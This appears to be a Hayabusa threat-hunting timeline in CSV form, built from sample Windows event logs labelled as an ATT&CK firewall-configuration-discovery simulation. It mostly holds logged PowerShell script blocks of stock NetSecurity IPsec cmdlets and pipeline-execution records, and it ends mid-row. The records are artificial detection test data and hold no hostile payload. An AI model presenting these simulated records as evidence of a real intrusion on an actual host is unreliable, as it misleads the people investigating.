[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' function Copy-NetIPsecMainModeCryptoSet { 
[CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardc",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"imv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; 
value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
name=""Function""; value=""New-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 